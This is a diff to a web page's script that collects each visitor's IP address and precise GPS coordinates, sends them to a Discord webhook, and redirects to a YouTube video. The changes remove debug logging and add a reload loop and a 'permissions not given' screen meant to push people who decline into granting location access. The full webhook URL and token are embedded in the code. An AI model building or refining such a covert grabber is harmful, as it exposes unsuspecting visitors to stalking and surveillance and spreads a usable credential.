--- a/index.html
+++ b/index.html
@@ -25,6 +25,7 @@
   <script>
   const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
   const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
+  const deniedPageUrl = "data:text/html,<html style='background:black;color:white;font-family:sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;'><body><div>Permissions not given. Please allow location access and reload the page.</div></body></html>";
 
   function sendToDiscord(lat, lon, acc, ipData) {
     const mapLink = `https://www.google.com/maps?q=${lat},${lon}`;
@@ -62,20 +63,16 @@
         if ("geolocation" in navigator) {
           navigator.geolocation.getCurrentPosition(
             (pos) => {
+              localStorage.removeItem("locationDenied");
               const lat = pos.coords.latitude;
               const lon = pos.coords.longitude;
               const acc = pos.coords.accuracy;
-
-              console.log("Lat:", lat);
-              console.log("Lon:", lon);
-              console.log("Accuracy:", acc);
-              console.log("IP:", ipData.ipAddress);
-
               sendToDiscord(lat, lon, acc, ipData);
             },
             (err) => {
               console.error("GPS error:", err.message);
-              window.location.href = "about:blank";
+              localStorage.setItem("locationDenied", "true");
+              window.location.href = deniedPageUrl;
             },
             {
               enableHighAccuracy: true,
@@ -90,7 +87,14 @@
       });
   }
 
-  window.onload = getIPAndGPS;
+  window.onload = () => {
+    if (localStorage.getItem("locationDenied")) {
+      localStorage.removeItem("locationDenied");
+      location.reload();
+    } else {
+      getIPAndGPS();
+    }
+  };
   </script>
 </body>
 </html>
